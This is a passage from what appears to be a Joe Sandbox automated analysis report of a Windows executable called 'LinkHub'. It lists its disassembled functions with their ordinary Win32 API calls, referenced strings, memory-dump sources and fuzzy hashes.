Instruction ID: 8f798fa7bfbd52dd58a5a3c68373e08a09f8a7a7fb309aabe5a23bdc63f4f47b
Opcode Fuzzy Hash: 7c4f3c1ee7ed72d952a5d77c621a337cfb9566ea78d36242dc32185c5cfb0484
Instruction Fuzzy Hash: 6471E6B26083029FC710EF24D841A6BB7E4EF98758F10592EF895A7391EB31DD45CBA1

Function 00E36382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00E36395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E363A7
SetWindowTextW.USER32(?,?), ref: 00E363BE
GetDlgItem.USER32(?,000003EA), ref: 00E363D3
SetWindowTextW.USER32(00000000,?), ref: 00E363D9
GetDlgItem.USER32(?,000003E9), ref: 00E363E9
SetWindowTextW.USER32(00000000,?), ref: 00E363EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E36410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E3642A
GetWindowRect.USER32(?,?), ref: 00E36433
_wcslen.LIBCMT ref: 00E3649A
SetWindowTextW.USER32(?,?), ref: 00E364D6
GetDesktopWindow.USER32 ref: 00E364DC
GetWindowRect.USER32(00000000), ref: 00E364E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E3653A
GetClientRect.USER32(?,?), ref: 00E36547
PostMessageW.USER32(?,00000005,00000000,?), ref: 00E3656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E36596

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 1e3e9f7a9d6a68a0e3264e2e329a696ed1fde54ee2652a2d2780e9e949b2d818
Instruction ID: 8eeb01a3ae5ee699cc10af117e36a0cb8a62d6aac7e48673a323cb1542af7f2f
Opcode Fuzzy Hash: 1e3e9f7a9d6a68a0e3264e2e329a696ed1fde54ee2652a2d2780e9e949b2d818
Instruction Fuzzy Hash: 9171A231A00705AFDB20DFB9CD49AAEBBF5FF48704F105928E196B25A0D7B1E944CB50

Function 00E5086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00E50884
LoadCursorW.USER32(00000000,00007F8A), ref: 00E5088F
LoadCursorW.USER32(00000000,00007F00), ref: 00E5089A
LoadCursorW.USER32(00000000,00007F03), ref: 00E508A5
LoadCursorW.USER32(00000000,00007F8B), ref: 00E508B0
LoadCursorW.USER32(00000000,00007F01), ref: 00E508BB
LoadCursorW.USER32(00000000,00007F81), ref: 00E508C6
LoadCursorW.USER32(00000000,00007F88), ref: 00E508D1
LoadCursorW.USER32(00000000,00007F80), ref: 00E508DC
LoadCursorW.USER32(00000000,00007F86), ref: 00E508E7
LoadCursorW.USER32(00000000,00007F83), ref: 00E508F2
LoadCursorW.USER32(00000000,00007F85), ref: 00E508FD
LoadCursorW.USER32(00000000,00007F82), ref: 00E50908
LoadCursorW.USER32(00000000,00007F84), ref: 00E50913
LoadCursorW.USER32(00000000,00007F04), ref: 00E5091E
LoadCursorW.USER32(00000000,00007F02), ref: 00E50929
GetCursorInfo.USER32(?), ref: 00E50939
GetLastError.KERNEL32 ref: 00E5097B

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 9911080b67e7397c74cac90c4496491b36aceafa77c6770c1115e528919c98ac
Instruction ID: 9256d89cdcafcbb9c46102f29d7fb3754554d980d3743049bd06ddc96d80a34c
Opcode Fuzzy Hash: 9911080b67e7397c74cac90c4496491b36aceafa77c6770c1115e528919c98ac
Instruction Fuzzy Hash: 2D4154B0D083196EDB109FBA8C8585EBFE8FF44754B50452AF51CEB291DA78E805CFA1

Function 00E33A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E33AD9
_wcslen.LIBCMT ref: 00E33B44

Strings

CLASSNN, xrefs: 00E33B3F, 00E33B50
NAME, xrefs: 00E33C81, 00E33C92
TEXT, xrefs: 00E33DC8
REGEXPCLASS, xrefs: 00E33BA1, 00E33BB2
k, xrefs: 00E33CE6
INSTANCE, xrefs: 00E33D9F
CLASS, xrefs: 00E33AD4, 00E33AF1

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k
API String ID: 176396367-2171760788
Opcode ID: 2b5a50f3b35b165827bb49d54c91d85d6df70b17e1430dfb6f8c077b6346bd94
Instruction ID: 4e4844cae469c71dfc902bcdc190f4b81c4d6d680aea4e228f4f0f33d1f785e9
Opcode Fuzzy Hash: 2b5a50f3b35b165827bb49d54c91d85d6df70b17e1430dfb6f8c077b6346bd94
Instruction Fuzzy Hash: 59E1D231A006169BCB149FB5C849AEEFFB0FF44754F50A12AE456F7250EB30AE45C7A0

Function 00E69B7A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

DragQueryPoint.SHELL32(?,?), ref: 00E69BA3

Part of subcall function 00E680AE: ClientToScreen.USER32(?,?), ref: 00E680D4
Part of subcall function 00E680AE: GetWindowRect.USER32(?,?), ref: 00E6814A
Part of subcall function 00E680AE: PtInRect.USER32(?,?,?), ref: 00E6815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00E69C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E69C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E69C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E69C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00E69C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00E69CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00E69CD3
DragFinish.SHELL32(?), ref: 00E69CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00E69DCD

Strings

(, xrefs: 00E69B8C
@GUI_DROPID, xrefs: 00E69CFA
@GUI_DRAGID, xrefs: 00E69D45
(, xrefs: 00E69DAB
@GUI_DRAGFILE, xrefs: 00E69D7C

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$($(
API String ID: 221274066-1080139498
Opcode ID: 45f7154d3dd655b7e3b9b86392cfcfc409b0ca333512a4c41fc099bcdbb9d989
Instruction ID: dd3d1e782918910df800545b5084f74768681083da5a73c7563d6855ae238d77
Opcode Fuzzy Hash: 45f7154d3dd655b7e3b9b86392cfcfc409b0ca333512a4c41fc099bcdbb9d989
Instruction Fuzzy Hash: 3B619E71508300AFC701EF65DC85D9FBBE8EFC9790F40091EF591A62A1DB70AA09CB62

Function 00DF0436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00DF0436

Part of subcall function 00DF045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00EA170C,00000FA0,962D4BCC,?,?,?,?,00E12733,000000FF), ref: 00DF048C
Part of subcall function 00DF045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00E12733,000000FF), ref: 00DF0497
Part of subcall function 00DF045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00E12733,000000FF), ref: 00DF04A8
Part of subcall function 00DF045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00DF04BE
Part of subcall function 00DF045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00DF04CC
Part of subcall function 00DF045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00DF04DA
Part of subcall function 00DF045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DF0505
Part of subcall function 00DF045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DF0510

___scrt_fastfail.LIBCMT ref: 00DF0457

Part of subcall function 00DF0413: __onexit.LIBCMT ref: 00DF0419

Strings

kernel32.dll, xrefs: 00DF04A3
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00DF0492
InitializeConditionVariable, xrefs: 00DF04B8
SleepConditionVariableCS, xrefs: 00DF04C4
WakeAllConditionVariable, xrefs: 00DF04D2

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: e0c12cd3c87ad323255a6e7f54fcbc778123b85f286787ee18128ee24e70c535
Instruction ID: ba239f4ce9fcd4b405ff689df8b3ceae2f2087d9126c277149a630b78ed98ff1
Opcode Fuzzy Hash: e0c12cd3c87ad323255a6e7f54fcbc778123b85f286787ee18128ee24e70c535
Instruction Fuzzy Hash: 8B212C32B45319AFD7201BA5AC05B7A3B95DB06BA1F068116FB05F7381DBF098044971

Function 00E44F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00E6DCD0), ref: 00E44F6C
_wcslen.LIBCMT ref: 00E44F80
_wcslen.LIBCMT ref: 00E44FDE
_wcslen.LIBCMT ref: 00E45039
_wcslen.LIBCMT ref: 00E45084
_wcslen.LIBCMT ref: 00E450EC

Part of subcall function 00DEFD52: _wcslen.LIBCMT ref: 00DEFD5D

GetDriveTypeW.KERNEL32(?,00E97C10,00000061), ref: 00E45188

Strings

cdrom, xrefs: 00E44FD4, 00E44FD9
unknown, xrefs: 00E4514D
all, xrefs: 00E44F76, 00E44F7B
removable, xrefs: 00E4502F, 00E45034
network, xrefs: 00E450E2, 00E450E7
ramdisk, xrefs: 00E45136
fixed, xrefs: 00E4507A, 00E4507F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 8e1c0b7ee28412bd8e79709298af1e3ed4dd298130eb66966c3bbda6ae433de6
Instruction ID: 91a26d026335d9c5cc039eb1eb03d591a880d8b2487c11da21c00c09249c8034
Opcode Fuzzy Hash: 8e1c0b7ee28412bd8e79709298af1e3ed4dd298130eb66966c3bbda6ae433de6
Instruction Fuzzy Hash: 94B1F5326087029FC710DF28E891A7BB7E5EF94724F50691EF496A7292D770D844CBA2

Function 00E5BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E5BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E5BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E5BC34
_wcslen.LIBCMT ref: 00E5BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E5BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E5BC96
_wcslen.LIBCMT ref: 00E5BD92

Part of subcall function 00E40F4E: GetStdHandle.KERNEL32(000000F6), ref: 00E40F6D

_wcslen.LIBCMT ref: 00E5BDAB
_wcslen.LIBCMT ref: 00E5BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E5BE16
GetLastError.KERNEL32(00000000), ref: 00E5BE67
CloseHandle.KERNEL32(?), ref: 00E5BE99
CloseHandle.KERNEL32(00000000), ref: 00E5BEAA
CloseHandle.KERNEL32(00000000), ref: 00E5BEBC
CloseHandle.KERNEL32(00000000), ref: 00E5BECE
CloseHandle.KERNEL32(?), ref: 00E5BF43

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 09f4c3cd2c5777c1cdddaf2d24fc7c75c76cab8876f4ad2ae9bd63693ebd7418
Instruction ID: 03c65dad52ec5fa5316ff1b6efbf1ca37f00ffd387a0c4e9b1e74b5ca8bd5fab
Opcode Fuzzy Hash: 09f4c3cd2c5777c1cdddaf2d24fc7c75c76cab8876f4ad2ae9bd63693ebd7418
Instruction Fuzzy Hash: 00F1BF716043009FC714EF24C891B6ABBE1EF84315F18995DF895AB3A2CB71EC49CB62

Function 00E54A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E6DCD0), ref: 00E54B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E54B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00E6DCD0), ref: 00E54B4F
FreeLibrary.KERNEL32(00000000,?,00E6DCD0), ref: 00E54B9B
StringFromGUID2.OLE32(?,?,00000028,?,00E6DCD0), ref: 00E54C05
SysFreeString.OLEAUT32(00000009), ref: 00E54CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E54D25
SysFreeString.OLEAUT32(?), ref: 00E54D4F

Strings

kernel32.dll, xrefs: 00E54B13
GetModuleHandleExW, xrefs: 00E54B24

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 499840ad2cb7547c1230d5fc7b067e4f0a9c8c72b83df3079b453abc5db48926
Instruction ID: 2a959d45f1a4a89ed5b426625ce68703169acd5c295718425bbfbd438768e258
Opcode Fuzzy Hash: 499840ad2cb7547c1230d5fc7b067e4f0a9c8c72b83df3079b453abc5db48926
Instruction Fuzzy Hash: F1123EB1A00109EFDB14CF54C884EAEB7B5FF45319F149498F905AB291DB71ED8ACBA0

Function 00DD381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00EA29C0), ref: 00E13F72
GetMenuItemCount.USER32(00EA29C0), ref: 00E14022
GetCursorPos.USER32(?), ref: 00E14066
SetForegroundWindow.USER32(00000000), ref: 00E1406F
TrackPopupMenuEx.USER32(00EA29C0,00000000,?,00000000,00000000,00000000), ref: 00E14082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E1408E

Strings

0, xrefs: 00DD382D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: ed80bd3a9adacde0be3930ac7a064b9c138338dcccb31313dc898aea8fb035b0
Instruction ID: f035f611421e5965daa7f01e303162ef442920a12ee9b550405e44272dbd1614
Opcode Fuzzy Hash: ed80bd3a9adacde0be3930ac7a064b9c138338dcccb31313dc898aea8fb035b0
Instruction Fuzzy Hash: B171F370B44305BEEB219B29DC49FEABF65FF08368F100216F624762D0C7B1A954DB61

Function 00E67711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00E67823

Part of subcall function 00DD8577: _wcslen.LIBCMT ref: 00DD858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E67897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E678B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E678CC
DestroyWindow.USER32(?), ref: 00E678ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DD0000,00000000), ref: 00E6791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E67935
GetDesktopWindow.USER32 ref: 00E6794E
GetWindowRect.USER32(00000000), ref: 00E67955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E6796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E67985

Part of subcall function 00DD2234: GetWindowLongW.USER32(?,000000EB), ref: 00DD2242

Strings

0, xrefs: 00E677D0
tooltips_class32, xrefs: 00E67890, 00E67915

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: bf4b02195aa22bb2f6370bf060b2b9f3cc4035d2c74888aad3ca767dc6b9a152
Instruction ID: 80aae7288cb062caf19149da9c1883b6e129a105c9c2d362bf81c349d6bb8be5
Opcode Fuzzy Hash: bf4b02195aa22bb2f6370bf060b2b9f3cc4035d2c74888aad3ca767dc6b9a152
Instruction Fuzzy Hash: 9771AA70548240AFD725CF19EC48F6BBBF9EBC9348F445A1EF985A7261C7B0A909CB11

Function 00DD146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DD1488,?,00000000,?,?,?,?,00DD145A,00000000,?), ref: 00DD1865

DestroyWindow.USER32(?), ref: 00DD1521
KillTimer.USER32(00000000,?,?,?,?,00DD145A,00000000,?), ref: 00DD15BB
DestroyAcceleratorTable.USER32(00000000), ref: 00E129B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00DD145A,00000000,?), ref: 00E129E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00DD145A,00000000,?), ref: 00E129F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DD145A,00000000), ref: 00E12A15
DeleteObject.GDI32(00000000), ref: 00E12A27

Strings

<), xrefs: 00DD15E0

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: <)
API String ID: 641708696-200976629
Opcode ID: 5130ec651ca1062f784fc0507ce5b9d9047d81391446041127f6ec090673deae
Instruction ID: 14be9a59122edbfcc6409d1adc81481f64896e4c63af5449ce430e05e1c6469b
Opcode Fuzzy Hash: 5130ec651ca1062f784fc0507ce5b9d9047d81391446041127f6ec090673deae
Instruction Fuzzy Hash: C9618834A04711EFCB358F19ED48B2A77B1FB85326F14511EE5826A660C374F8A8CBA0

Function 00E4CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E4CEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E4CF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E4CF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E4CF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00E4CF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E4CF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E4CF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E4CFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E4D021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E4D035
InternetCloseHandle.WININET(00000000), ref: 00E4D040

Strings

, xrefs: 00E4CFBA

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: dbb23242a609fa39669ced68d5de670846e63d7b8011eb11582a221a338d972a
Instruction ID: 882d8a7f6b2c29d0a783dbb34038600a99f78afc0b9c5aa052b005edd3e361fa
Opcode Fuzzy Hash: dbb23242a609fa39669ced68d5de670846e63d7b8011eb11582a221a338d972a
Instruction Fuzzy Hash: 5451A171604604BFD7218F61EC44ABB7BFDFF08788F10541AF545A7110D774E9499B61

Function 00E68FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E666D6,?,?), ref: 00E68FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E666D6,?,?,00000000,?), ref: 00E68FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E666D6,?,?,00000000,?), ref: 00E69009
CloseHandle.KERNEL32(00000000,?,?,?,?,00E666D6,?,?,00000000,?), ref: 00E69016
